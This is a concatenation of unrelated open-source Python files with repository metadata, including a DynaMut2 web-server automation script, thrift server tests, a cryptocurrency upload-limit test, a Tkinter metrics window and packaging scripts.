7954529fc932041b1ad2e0f333e4bc6dec248b5a | 3,016 | py | Python | auto_dynamut2.py | automutation/Mutation-prediction-automation | a6a34925c6962d91d2dd92e3a59b09f09d2e3b05 | [
"AFL-1.1"
] | null | null | null | auto_dynamut2.py | automutation/Mutation-prediction-automation | a6a34925c6962d91d2dd92e3a59b09f09d2e3b05 | [
"AFL-1.1"
] | null | null | null | auto_dynamut2.py | automutation/Mutation-prediction-automation | a6a34925c6962d91d2dd92e3a59b09f09d2e3b05 | [
"AFL-1.1"
] | null | null | null | #!usr/bin/python3
import re
import mechanicalsoup as msp
import sys
import pandas as pd
import os
def runDynamut(pdbFile,mutationFile,fChain):
os.chdir("/home/ibab/automutation")
try:
chain = fChain
file1 = open(mutationFile,"r")
muts = file1.readlines()
file1.close()
muts = [x.strip() for x in muts]
newRes = [x[-1] for x in muts]
oldRes = [x[0] for x in muts]
pos = []
for x in muts:
position = ''.join(re.findall('\d',x))
pos.append(int(position))
pdbfile=open(pdbFile,"r")
pdblines=pdbfile.readlines()
for lines in pdblines:
if re.match("^ATOM",lines):
firstRes=re.split('\s+',lines)[5]
break
missing = []
for lines in pdblines:
if re.match("REMARK 465",lines):
missing.append(lines)
chainA=[]
for x in missing[7:]:
if re.split('\s+',x)[3]==chain:
chainA.append(int(re.split('\s+',x)[4]))
common=[x for x in pos if x in chainA]
#Removing missing residues from mutation file
notCommon=[]
for x in pos:
if x in common or x < int(firstRes):
notCommon.append(0)
else:
notCommon.append(x)
muts=[]
for i in range(len(pos)):
if notCommon[i]==0:
pass
else:
muts.append(oldRes[i]+str(notCommon[i])+newRes[i])
outFile=open("outFiles/dynamut2.out","w")
outFile.write("Mutation,Stability,ddG\n")
outFile.close()
url1 = "http://biosig.unimelb.edu.au/dynamut2/submit_prediction"
logFile=open("logFiles/dynamut2.log","w")
outFile=open("outFiles/dynamut2.out","a")
for i in range(len(muts)):
#Submission of mutations to the web server
br = msp.StatefulBrowser()
br.open(url1)
form = br.select_form(nr=0)
form.set("pdb_file_single",pdbFile)
br["mutation_single"]=muts[i]
br["chain_single"] = chain
br.submit_selected()
if "Error" in br.page.text:
print("DynaMut2: Error in submission of a mutation. Check log file for details.")
logFile.write(br.page.text.split("Submission Error")[2].split("arrow")[0])
else:
#Fetching results from the webpage
res = br.get_url()
while("Predicted Stability Change" not in br.page.text):
br.open(res)
result=re.split("Predicted Stability Change",br.page.text)[1].split('\n\n')[0]
score=result.split('\n')[1].split()[0]
stability=result.split('\n')[2][1:-1]
outFile.write(muts[i]+","+stability+","+score+"\n")
logFile.close()
outFile.close()
"""pos = []
for x in df.mutation:
position = ''.join(re.findall('\d',x))
pos.append(int(position))
df["pos"] = pos
df = df.sort_values(by=["pos"])
df = read_csv("outFiles/dynamut2.out",header=True,index_col=False)
stab = []
for x in df.score:
if x < 0:
stab.append("Destabilizing")
else:
stab.append("Stabilizing")
df["stability"] = stab
df = df.filter(["mutation","stability","prediction"],axis=1)
df.columns = ["Mutation","Prediction","Stability"]
df.to_csv("outFiles/dynaRes.out",index=False)
os.system("rm submit.txt")"""
except:
print(str(sys.exc_info()[0])+" occured and DynaMut2 could not run")
| 29.281553 | 85 | 0.651857 |
79545308c1ae02f449457df0d1ce175543a64c0e | 1,265 | py | Python | src/vak/timebins.py | yardencsGitHub/vak | 04da97b02ded5acccab437c2538d0a1ded3bef80 | [
"BSD-3-Clause"
] | 1 | 2021-04-27T01:22:38.000Z | 2021-04-27T01:22:38.000Z | src/vak/timebins.py | yardencsGitHub/vak | 04da97b02ded5acccab437c2538d0a1ded3bef80 | [
"BSD-3-Clause"
] | null | null | null | src/vak/timebins.py | yardencsGitHub/vak | 04da97b02ded5acccab437c2538d0a1ded3bef80 | [
"BSD-3-Clause"
] | null | null | null | """module for functions that deal with vector of times from a spectrogram,
i.e. where elements are the times at bin centers"""
import numpy as np
def timebin_dur_from_vec(time_bins, n_decimals_trunc=5):
"""compute duration of a time bin, given the
vector of time bin centers associated with a spectrogram
Parameters
----------
time_bins : numpy.ndarray
vector of times in spectrogram, where each value is a bin center.
n_decimals_trunc : int
number of decimal places to keep when truncating the timebin duration calculated from
the spectrogram arrays. Default is 5.
Returns
-------
timebin_dur : float
duration of a timebin, estimated from vector of times
Notes
-----
takes mean of pairwise difference between neighboring time bins,
to deal with floating point error, then rounds and truncates to specified decimal place
"""
# first we round to the given number of decimals
timebin_dur = np.around(
np.mean(np.diff(time_bins)),
decimals=n_decimals_trunc
)
# only after rounding do we truncate any decimal place past decade
decade = 10 ** n_decimals_trunc
timebin_dur = np.trunc(timebin_dur * decade) / decade
return timebin_dur
| 34.189189 | 93 | 0.699605 |
7954532a5ef8fd1c8821aa027f9f95090399c26a | 1,547 | py | Python | test/test_er.py | chrisgarcia001/Crisis-Volunteer-Resource-Allocation | d181327d9f077aa40f817ec066bfc2324d1bf01b | [
"MIT"
] | null | null | null | test/test_er.py | chrisgarcia001/Crisis-Volunteer-Resource-Allocation | d181327d9f077aa40f817ec066bfc2324d1bf01b | [
"MIT"
] | null | null | null | test/test_er.py | chrisgarcia001/Crisis-Volunteer-Resource-Allocation | d181327d9f077aa40f817ec066bfc2324d1bf01b | [
"MIT"
] | null | null | null | from os import sys
sys.path.insert(0, '../src/')
from experiment_runner import *
param_path = './params/base.csv'
def mpp(matrix):
for row in matrix:
print(row)
#params = {'tasks per shift':3, 'shifts per day':2, 'days in horizon':3, 'min shifts off between tasks':1}
params = read_params(param_path, True)
dg = DataGenerator(params)
# print('Random test')
# for i in range(10):
# print(random_float(5, 10))
print('Dummy Tasks')
mpp(dg.get_dummy_task_indices())
print('Tasks by Shift')
mpp(dg.get_tasks_by_shift())
print('Task Shift Map')
mpp(dg.task_shift_map())
print('Task Conflict Matrix')
mpp(dg.build_task_conflict_matrix())
print('E Matrix')
mpp(dg.build_E_matrix())
print('Transportation Cost Matrix')
mpp(dg.build_transp_cost_matrix())
# print('\nShortage Cost Matrix')
# mpp(dg.build_shortage_weight_matrix())
# print('\nResource-Type Matrix')
# mpp(dg.build_resource_type_matrix())
# print('\nAvailability Matrix')
# mpp(dg.build_availability_matrix())
# print('\nDependency Ratio Matrix')
# mpp(dg.build_dependency_matrix())
# print('\nInitial Demand Matrix')
# init_demand = dg.build_initial_demand_matrix()
# mpp(init_demand)
# print('\nUpdated Demand Matrix')
# mpp(dg.build_updated_demand_matrix(init_demand))
# print('\nInitial Problem')
# init_data = dg.build_initial_data()
# print(init_data['text'])
# print('\nUpdated Problem')
# print(dg.build_updated_data(init_data, init_data['y'])['text'])
#--- Test ProblemExecutor.
ex = ProblemExecutor(param_path)
#ex.solve_instance(1)
ex.solve_problem_set() | 22.42029 | 106 | 0.733032 |
795454e09b3fe8f1381cfa7b205ca865fb0f9cfc | 7,836 | py | Python | thrift/lib/py/util/TCppServerTestManagerTest.py | CacheboxInc/fbthrift | b894dd9192ea4684c0067c93bb2ba2b9547749ec | [
"Apache-2.0"
] | 1 | 2018-02-28T06:45:51.000Z | 2018-02-28T06:45:51.000Z | thrift/lib/py/util/TCppServerTestManagerTest.py | CacheboxInc/fbthrift | b894dd9192ea4684c0067c93bb2ba2b9547749ec | [
"Apache-2.0"
] | null | null | null | thrift/lib/py/util/TCppServerTestManagerTest.py | CacheboxInc/fbthrift | b894dd9192ea4684c0067c93bb2ba2b9547749ec | [
"Apache-2.0"
] | 1 | 2018-02-28T06:45:18.000Z | 2018-02-28T06:45:18.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import threading
import unittest
from thrift.Thrift import TApplicationException, TPriority
from thrift.protocol import THeaderProtocol
from thrift.transport import TSocket
from thrift.transport import THeaderTransport
from thrift.transport.TTransport import TTransportException
from thrift.util.TCppServerTestManager import TCppServerTestManager
from thrift.util.test_service import (
TestService,
PriorityService,
SubPriorityService
)
from thrift.util.test_service.ttypes import UserException2
class BaseTest(unittest.TestCase):
def _perform_rpc(self, server, service, method, *args, **kwargs):
# Default 5s timeout
return self._expiring_rpc(
server, service, method, 5 * 1000, *args, **kwargs)
# Same but with a timeout
def _expiring_rpc(self, server, service, method, tm, *args, **kwargs):
host, port = server.addr()
with TSocket.TSocket(host=host, port=port) as sock:
sock.setTimeout(tm)
transport = THeaderTransport.THeaderTransport(sock)
protocol = THeaderProtocol.THeaderProtocol(transport)
client = service.Client(protocol, protocol)
return getattr(client, method)(*args, **kwargs)
class TestTCppServerTestManager(BaseTest):
class Handler(TestService.Iface):
def __init__(self, data):
self.__data = data
def getDataById(self, id):
return self.__data[id]
def throwUserException(self):
raise UserException2("Some message")
def throwUncaughtException(self, msg):
raise AssertionError(msg)
def _perform_getDataById(self, server, val):
return self._perform_rpc(server, TestService, 'getDataById', val)
def test_with_handler(self):
handler = self.Handler({7: "hello"})
with TCppServerTestManager(handler) as server:
data = self._perform_getDataById(server, 7)
self.assertEquals(data, "hello")
def test_with_processor(self):
handler = self.Handler({7: "hello"})
processor = TestService.Processor(handler)
with TCppServerTestManager(processor) as server:
data = self._perform_getDataById(server, 7)
self.assertEquals(data, "hello")
def test_with_server(self):
handler = self.Handler({7: "hello"})
processor = TestService.Processor(handler)
server = TCppServerTestManager.make_server(processor)
with TCppServerTestManager(server) as server:
data = self._perform_getDataById(server, 7)
self.assertEquals(data, "hello")
def test_throw_populates_headers(self):
handler = self.Handler({7: "hello"})
processor = TestService.Processor(handler)
server = TCppServerTestManager.make_server(processor)
with TCppServerTestManager(server) as server:
host, port = server.addr()
with TSocket.TSocket(host=host, port=port) as sock:
transport = THeaderTransport.THeaderTransport(sock)
protocol = THeaderProtocol.THeaderProtocol(transport)
client = TestService.Client(protocol, protocol)
try:
client.throwUserException()
self.fail('Expect to throw UserException2')
except UserException2:
pass
self.assertEquals("UserException2", transport.get_headers()["uex"])
self.assertIn("Some message", transport.get_headers()["uexw"])
try:
client.throwUncaughtException("a message!")
self.fail('Expect to throw TApplicationException')
except TApplicationException:
pass
self.assertEquals(
"TApplicationException", transport.get_headers()["uex"])
self.assertIn(
"a message!", transport.get_headers()["uexw"])
class TestTCppServerPriorities(BaseTest):
class PriorityHandler(PriorityService.Iface):
event = threading.Event()
stuck = threading.Event()
def bestEffort(self):
return True
def normal(self):
return True
def important(self):
return True
def unspecified(self):
return True
class SubPriorityHandler(PriorityService.Iface):
def child_unspecified(self):
return True
def child_highImportant(self):
return True
def test_processor_priorities(self):
handler = self.PriorityHandler()
processor = PriorityService.Processor(handler)
# Did we parse annotations correctly
self.assertEquals(
processor.get_priority('bestEffort'),
TPriority.BEST_EFFORT
)
self.assertEquals(
processor.get_priority('normal'),
TPriority.NORMAL
)
self.assertEquals(
processor.get_priority('important'),
TPriority.IMPORTANT
)
self.assertEquals(
processor.get_priority('unspecified'),
TPriority.HIGH
)
def test_processor_child_priorities(self):
handler = self.SubPriorityHandler()
processor = SubPriorityService.Processor(handler)
# Parent priorities present in extended services
# Make sure parent service priorities don't leak to child services
self.assertEquals(
processor.get_priority('bestEffort'),
TPriority.BEST_EFFORT
)
self.assertEquals(
processor.get_priority('normal'),
TPriority.NORMAL
)
self.assertEquals(
processor.get_priority('important'),
TPriority.IMPORTANT
)
self.assertEquals(
processor.get_priority('unspecified'),
TPriority.HIGH
)
# Child methods
self.assertEquals(
processor.get_priority('child_unspecified'),
TPriority.NORMAL
)
self.assertEquals(
processor.get_priority('child_highImportant'),
TPriority.HIGH_IMPORTANT
)
def test_header_priorities(self):
pass
def test_server_queues(self):
handler = self.PriorityHandler()
processor = PriorityService.Processor(handler)
# Make sure there are 0 threads for best_effort and 1 queue slot
# (the queue size cannot be set to 0)
cppserver = TCppServerTestManager.make_server(processor)
cppserver.setNewPriorityThreadManager(
best_effort=0,
normal=1,
important=1,
high=0,
high_important=0,
enableTaskStats=False,
maxQueueLen=1
)
# Since we'll have a Cpp2Worker stuck, don't wait for it to exit
cppserver.setWorkersJoinTimeout(0)
with TCppServerTestManager(cppserver) as server:
# Send a request to the server and return immediately
try:
self._expiring_rpc(server, PriorityService, 'bestEffort', 0)
except TTransportException:
pass
# The queue for bestEffort should be full, as the first request
# will never get processed (best_effort=0)
with self.assertRaises(TApplicationException):
self._perform_rpc(server, PriorityService, 'bestEffort')
# However the normal prio one should go through
self.assertTrue(
self._perform_rpc(server, PriorityService, 'normal'))
cppserver.getThreadManager().clearPending()
| 34.218341 | 83 | 0.630296 |
7954561a6ce5860848524a92092e838a5ccdb560 | 917 | py | Python | ShowMetrics.py | axell-brendow/image-processing-work | bf683081e394891e6865214273a69ee0be6b09d8 | [
"MIT"
] | 1 | 2020-10-06T20:34:52.000Z | 2020-10-06T20:34:52.000Z | ShowMetrics.py | axell-brendow/image-processing-work | bf683081e394891e6865214273a69ee0be6b09d8 | [
"MIT"
] | null | null | null | ShowMetrics.py | axell-brendow/image-processing-work | bf683081e394891e6865214273a69ee0be6b09d8 | [
"MIT"
] | null | null | null | import tkinter as tk
class ShowMetrics:
def __init__(
self,
parent: tk.Tk,
executionTime,
FP,
FN,
TP,
TN,
TPR, # Sensitivity, hit rate, recall, or true positive rate
TNR, # Specificity or true negative rate
ACC, # Overall accuracy
accuracy
) -> None:
self.parent = parent
self.root = tk.Toplevel(self.parent)
self.root.title("Metrics")
self.metricsLabel = tk.Text(self.root, borderwidth=0)
self.metricsLabel.insert(1.0, f'''Execution time: {round(executionTime, 3)} sec
Accuracy: {round(accuracy, 2)}
Overall Accuracy:
{[round(x, 2) for x in ACC]} -> {round(ACC.mean(), 2)}
Sensibility:
{[round(x, 2) for x in TPR]} -> {round(TPR.mean(), 2)}
Specificity:
{[round(x, 2) for x in TNR]} -> {round(TNR.mean(), 2)}
''')
self.metricsLabel.pack(fill='both', expand=True)
| 25.472222 | 87 | 0.584515 |
7954580b9effbd58bff968767a2bf7d1aae3595c | 341 | py | Python | portafolio/urls.py | JVacca12/FIRST | e3906209cae1198e1fbda4d00bc0a906e8294a69 | [
"MIT"
] | null | null | null | portafolio/urls.py | JVacca12/FIRST | e3906209cae1198e1fbda4d00bc0a906e8294a69 | [
"MIT"
] | null | null | null | portafolio/urls.py | JVacca12/FIRST | e3906209cae1198e1fbda4d00bc0a906e8294a69 | [
"MIT"
] | null | null | null | """Portafolio URLs."""
# Django
from django.urls import include, path
# Django REST Framework
from rest_framework.routers import DefaultRouter
# Views
from portafolio import views
router = DefaultRouter()
router.register(r'portafolio', views.PortafolioViewSet, basename='portafolio')
urlpatterns = [
path('', include(router.urls))
] | 20.058824 | 78 | 0.762463 |
79545890d90ff4c65a20dd8275c6d792c3daa8fb | 374 | py | Python | torch_kalman/internals/repr.py | Suhwan-Dev/torch-kalman | f310c42e264d1642819e4c49a8b0212209a18a85 | [
"MIT"
] | null | null | null | torch_kalman/internals/repr.py | Suhwan-Dev/torch-kalman | f310c42e264d1642819e4c49a8b0212209a18a85 | [
"MIT"
] | null | null | null | torch_kalman/internals/repr.py | Suhwan-Dev/torch-kalman | f310c42e264d1642819e4c49a8b0212209a18a85 | [
"MIT"
] | null | null | null | from torch import Tensor
class NiceRepr:
_repr_attrs = None
def __repr__(self) -> str:
kwargs = []
for k in self._repr_attrs:
v = getattr(self, k)
if isinstance(v, Tensor):
v = v.size()
kwargs.append("{}={!r}".format(k, v))
return "{}({})".format(type(self).__name__, ", ".join(kwargs))
| 24.933333 | 70 | 0.510695 |
795458e326508a3ef1e49b4b7506763e2e81e2ae | 9,473 | py | Python | qa/rpc-tests/maxuploadtarget.py | thoughtnetwork/thought | 7da757fbbf5c868b8b06aca57c8b3a1c82b1e0d2 | [
"MIT"
] | null | null | null | qa/rpc-tests/maxuploadtarget.py | thoughtnetwork/thought | 7da757fbbf5c868b8b06aca57c8b3a1c82b1e0d2 | [
"MIT"
] | 3 | 2019-10-16T15:33:36.000Z | 2021-07-28T00:38:37.000Z | qa/rpc-tests/maxuploadtarget.py | thoughtnetwork/thought | 7da757fbbf5c868b8b06aca57c8b3a1c82b1e0d2 | [
"MIT"
] | 1 | 2021-06-30T05:04:17.000Z | 2021-06-30T05:04:17.000Z | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017-2021 Thought Networks, LLC
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import ThoughtTestFramework
from test_framework.util import *
'''
Test behavior of -maxuploadtarget.
* Verify that getdata requests for old blocks (>1week) are dropped
if uploadtarget has been reached.
* Verify that getdata requests for recent blocks are respecteved even
if uploadtarget has been reached.
* Verify that the upload counters are reset after 24 hours.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
self.block_receive_map = {}
def add_connection(self, conn):
self.connection = conn
self.peer_disconnected = False
def on_inv(self, conn, message):
pass
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
def on_block(self, conn, message):
message.block.calc_sha256()
try:
self.block_receive_map[message.block.sha256] += 1
except KeyError as e:
self.block_receive_map[message.block.sha256] = 1
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
def veracked():
return self.verack_received
return wait_until(veracked, timeout=10)
def wait_for_disconnect(self):
def disconnected():
return self.peer_disconnected
return wait_until(disconnected, timeout=10)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
def on_close(self, conn):
self.peer_disconnected = True
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.connection.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout=timeout)
self.ping_counter += 1
return success
class MaxUploadTest(ThoughtTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
# Cache for utxos, as the listunspent may take a long time later in the test
self.utxo_cache = []
def setup_network(self):
# Start a node with maxuploadtarget of 200 MB (/24h)
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-maxuploadtarget=200", "-blockmaxsize=999000", "-maxtipage="+str(2*60*60*24*7)]))
def run_test(self):
# Advance all nodes 2 weeks in the future
old_mocktime = get_mocktime()
current_mocktime = old_mocktime + 2*60*60*24*7
set_mocktime(current_mocktime)
set_node_times(self.nodes, current_mocktime)
# Before we connect anything, we first set the time on the node
# to be in the past, otherwise things break because the CNode
# time counters can't be reset backward after initialization
self.nodes[0].setmocktime(old_mocktime)
# Generate some old blocks
self.nodes[0].generate(130)
# test_nodes[0] will only request old blocks
# test_nodes[1] will only request new blocks
# test_nodes[2] will test resetting the counters
test_nodes = []
connections = []
for i in range(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
# Test logic begins here
# Now mine a big block
mine_large_block(self.nodes[0], self.utxo_cache)
# Store the hash; we'll request this later
big_old_block = self.nodes[0].getbestblockhash()
old_block_size = self.nodes[0].getblock(big_old_block, True)['size']
big_old_block = int(big_old_block, 16)
# Advance to two days ago
self.nodes[0].setmocktime(current_mocktime - 2*60*60*24)
# Mine one more block, so that the prior block looks old
mine_large_block(self.nodes[0], self.utxo_cache)
# We'll be requesting this new block too
big_new_block = self.nodes[0].getbestblockhash()
big_new_block = int(big_new_block, 16)
# test_nodes[0] will test what happens if we just keep requesting the
# the same big old block too many times (expect: disconnect)
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, big_old_block))
max_bytes_per_day = 200*1024*1024
daily_buffer = 144 * MAX_BLOCK_SIZE
max_bytes_available = max_bytes_per_day - daily_buffer
success_count = max_bytes_available // old_block_size
# 144MB will be reserved for relaying new blocks, so expect this to
# succeed for ~70 tries.
for i in range(success_count):
test_nodes[0].send_message(getdata_request)
test_nodes[0].sync_with_ping()
assert_equal(test_nodes[0].block_receive_map[big_old_block], i+1)
assert_equal(len(self.nodes[0].getpeerinfo()), 3)
# At most a couple more tries should succeed (depending on how long
# the test has been running so far).
for i in range(3):
test_nodes[0].send_message(getdata_request)
test_nodes[0].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 2)
print("Peer 0 disconnected after downloading old block too many times")
# Requesting the current block on test_nodes[1] should succeed indefinitely,
# even when over the max upload target.
# We'll try 200 times
getdata_request.inv = [CInv(2, big_new_block)]
for i in range(200):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)
print("Peer 1 able to repeatedly download new block")
# But if test_nodes[1] tries for an old block, it gets disconnected too.
getdata_request.inv = [CInv(2, big_old_block)]
test_nodes[1].send_message(getdata_request)
test_nodes[1].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 1)
print("Peer 1 disconnected after trying to download old block")
print("Advancing system time on node to clear counters...")
# If we advance the time by 24 hours, then the counters should reset,
# and test_nodes[2] should be able to retrieve the old block.
self.nodes[0].setmocktime(current_mocktime)
test_nodes[2].sync_with_ping()
test_nodes[2].send_message(getdata_request)
test_nodes[2].sync_with_ping()
assert_equal(test_nodes[2].block_receive_map[big_old_block], 1)
print("Peer 2 able to download old block")
[c.disconnect_node() for c in connections]
#stop and start node 0 with 1MB maxuploadtarget, whitelist 127.0.0.1
print("Restarting nodes with -whitelist=127.0.0.1")
stop_node(self.nodes[0], 0)
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-whitelist=127.0.0.1", "-maxuploadtarget=1", "-blockmaxsize=999000", "-maxtipage="+str(2*60*60*24*7)])
#recreate/reconnect 3 test nodes
test_nodes = []
connections = []
for i in range(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
#retrieve 20 blocks which should be enough to break the 1MB limit
getdata_request.inv = [CInv(2, big_new_block)]
for i in range(20):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)
getdata_request.inv = [CInv(2, big_old_block)]
test_nodes[1].send_message(getdata_request)
test_nodes[1].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 3) #node is still connected because of the whitelist
print("Peer 1 still connected after trying to download old block (whitelisted)")
[c.disconnect_node() for c in connections]
if __name__ == '__main__':
MaxUploadTest().main()
| 39.307054 | 173 | 0.667476 |
7954594b11ba795a93ec65933aebccda65653abb | 790 | py | Python | python/tempsensor/setup.py | lalajoie/g1-Security | 2657e7cc86eee1cc3bf302d288bedf54bbb5200b | [
"MIT"
] | null | null | null | python/tempsensor/setup.py | lalajoie/g1-Security | 2657e7cc86eee1cc3bf302d288bedf54bbb5200b | [
"MIT"
] | null | null | null | python/tempsensor/setup.py | lalajoie/g1-Security | 2657e7cc86eee1cc3bf302d288bedf54bbb5200b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import setuptools
with open('README.md', "r") as f:
readme = f.read()
setuptools.setup(
name="PyMLX90614",
description="MLX90614 temperature sensor library",
version="0.0.3",
author="Connor Kneebone",
author_email="connor@sfxrescue.com",
url="https://github.com/Conr86/PyMLX90614",
license='MIT',
packages=setuptools.find_packages(exclude=['tests', 'notebooks']),
long_description=readme,
long_description_content_type="text/markdown",
install_requires=['smbus2'],
classifiers=[
"Programming Language :: Python :: 3",
'Intended Audience :: Developers',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
keywords='mlx90614 i2c smbus smbus2',
)
| 29.259259 | 70 | 0.663291 |
795459d5c8f4095918358e36eba7329133afb4ac | 3,752 | py | Python | contrib/macdeploy/custom_dsstore.py | Daviel360/litecoin | 0301f78bb93763684c9b3b67724ba8af14cde37e | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | Daviel360/litecoin | 0301f78bb93763684c9b3b67724ba8af14cde37e | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | Daviel360/litecoin | 0301f78bb93763684c9b3b67724ba8af14cde37e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00chocolatechipuser:\x00Documents:\x00chocolatechip:\x00chocolatechip:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/chocolatechipuser/Documents/chocolatechip/chocolatechip/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['ChocolateChip-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 62.533333 | 1,817 | 0.727345 |
795459f62e10926d736bec16eb7d375dbff9b817 | 48,822 | py | Python | guilded/ext/commands/help.py | ThomasJRyan/guilded.py | e1bb5cab839c80c851d4538111e4f1563bb15187 | [
"MIT"
] | 79 | 2020-09-19T22:48:04.000Z | 2022-03-25T03:49:26.000Z | guilded/ext/commands/help.py | ThomasJRyan/guilded.py | e1bb5cab839c80c851d4538111e4f1563bb15187 | [
"MIT"
